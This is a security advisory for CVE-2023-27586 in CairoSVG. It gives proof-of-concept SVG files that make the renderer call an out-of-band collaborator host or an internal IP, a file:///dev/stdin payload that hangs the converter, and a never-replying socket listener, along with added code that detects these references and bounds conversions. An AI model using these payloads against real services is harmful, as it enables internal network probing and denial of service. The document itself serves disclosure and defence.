GHSA-rwmf-w63j-p7gv
Vulnerability from github
Published
2023-03-20 21:27
Modified
2024-11-18 16:26
Summary
CairoSVG improperly processes SVG files loaded from external resources
Details

SSRF vulnerability

Summary

When CairoSVG processes an SVG file, it can make requests to internal hosts and to arbitrary external hosts.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

Details

A specially crafted SVG file can load an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDoS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server.

PoC

  1. Generating malicious svg file:

1.1 CairoSVG_exploit.svg:

```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<image height="200" width="200" xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/3" />
<style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style>
<style type="text/css">
     <![CDATA[
        @import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9");
        rect { fill: red; stroke: blue; stroke-width: 3 }
     ]]>
</style>
</svg>
```

1.2 CairoSVG_exploit_2.svg:

```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
    <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
        <image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" />
    </pattern>
</defs>
<path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
```

1.3 CairoSVG_exploit_3.svg:

```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" />
</svg>
```

  2. Run some commands:

```
$ python3 -m cairosvg CairoSVG_exploit.svg -f png
$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png
$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png
```

  3. See result requests in Burp Collaborator.
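
A pre-render check for services that accept uploaded SVGs, added here as an example (it is not code from the advisory or from CairoSVG): it lists every reference a renderer would have to fetch, covering the `href`, `xlink:href` and CSS `@import`/`url()` forms used in the PoC files and generalizing to any reference that is not a `#fragment` or `data:` URI. The function names, the sample document and the host `collab.example` are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Matches url(...) anywhere, or the bare-string form of @import.
CSS_REF = re.compile(r"""(?:url\(\s*|@import\s+(?!url\())['"]?([^'")\s;]+)""", re.I)


def is_external(ref):
    """True unless the reference stays inside the document (#id or data: URI)."""
    ref = ref.strip()
    if not ref or ref.startswith("#"):
        return False
    return urlsplit(ref).scheme.lower() != "data"


def external_refs(svg_text):
    """Return (element, reference) pairs a renderer would have to fetch."""
    found = []
    # ElementTree is used for brevity; a hardened parser such as defusedxml
    # is the usual choice when the XML itself is untrusted.
    for el in ET.fromstring(svg_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]
        refs = [el.get("href"), el.get(XLINK_HREF)]
        refs += CSS_REF.findall(" ".join(el.attrib.values()))
        if tag == "style":
            refs += CSS_REF.findall(el.text or "")
        found += [(tag, r) for r in refs if r and is_external(r)]
    return found


# Constructed sample; collab.example is a placeholder host.
SAMPLE = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
<defs><pattern id="p"><image xlink:href="http://collab.example/11"/></pattern></defs>
<style>@import url("http://collab.example/5");</style>
<style><![CDATA[ @import "http://collab.example:80/9"; rect { fill: red } ]]></style>
<use href="file:///dev/stdin"/>
<use href="#p"/>
<image href="data:image/png;base64,AAAA"/>
<path d="M0,0" fill="url(#p)"/>
</svg>"""

if __name__ == "__main__":
    for tag, ref in external_refs(SAMPLE):
        print(f"reject: <{tag}> references {ref}")
```

An upload handler can refuse any document for which `external_refs` returns a non-empty list before the file reaches the renderer.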

DOS vulnerability with SSTI

Summary

When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

PoC

  1. Generating malicious svg file:

```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="http://192.168.56.1:1234/" />
</svg>
```

  2. On another server, run this Python program:

```python
import socket

# Accept a single TCP connection and read from it without ever replying.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
    while True:
        data = conn.recv(2048)
s.close()
```

  3. Run commands:

```
$ timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png
```

(Without the timeout, the server will hang forever.)

DOS vulnerability with stdin file descriptor

Summary

A specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.

Operating system, version and so on

Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9

Tested CairoSVG version

2.6.0

PoC

  1. Generating malicious svg file:

```svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<use href="file:///dev/stdin" />
</svg>
```

  2. On another server, run this Python program:

```python
import socket

# Accept a single TCP connection and read from it without ever replying.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 1234))
s.listen(1)
conn, addr = s.accept()
with conn:
    while True:
        data = conn.recv(2048)
s.close()
```

  3. Run commands:

```
$ timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png
```
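
Both hangs above can be contained on installations that cannot yet move to the fixed release by running the conversion in a child process with stdin closed and a wall-clock limit, the same role `timeout 60` plays in the PoC commands. The following is an added example, not code from the advisory or from CairoSVG; `run_bounded`, the two stand-in commands and the file name `upload.svg` are assumptions made for the example.

```python
import subprocess
import sys


def run_bounded(cmd, timeout_s=10.0):
    """Run a converter command with stdin closed and a wall-clock limit.

    Returns (status, stdout); status is "ok", "failed" or "timeout".
    """
    try:
        proc = subprocess.run(
            cmd,
            stdin=subprocess.DEVNULL,  # a read of /dev/stdin hits EOF at once
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            timeout=timeout_s,         # the child is killed when this expires
        )
    except subprocess.TimeoutExpired:
        return "timeout", b""
    return ("ok" if proc.returncode == 0 else "failed"), proc.stdout


# Constructed stand-ins for the two hangs, so the block runs without CairoSVG.
READS_STDIN = [sys.executable, "-c",
               "import sys; print(len(sys.stdin.buffer.read()))"]
NEVER_RETURNS = [sys.executable, "-c", "import time; time.sleep(60)"]
# The page's own invocation is passed the same way (upload.svg is hypothetical):
#   run_bounded([sys.executable, "-m", "cairosvg", "upload.svg", "-f", "png"])

if __name__ == "__main__":
    print(run_bounded(READS_STDIN))                 # returns without blocking
    print(run_bounded(NEVER_RETURNS, timeout_s=1))  # killed after one second
```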



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "CairoSVG"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-27586"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-20T21:27:15Z",
    "nvd_published_at": "2023-03-20T16:15:00Z",
    "severity": "HIGH"
  },
  "id": "GHSA-rwmf-w63j-p7gv",
  "modified": "2024-11-18T16:26:29Z",
  "published": "2023-03-20T21:27:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27586"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Kozea/CairoSVG"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Kozea/CairoSVG/releases/tag/2.7.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cairosvg/PYSEC-2023-9.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "CairoSVG improperly processes SVG files loaded from external resources"
}

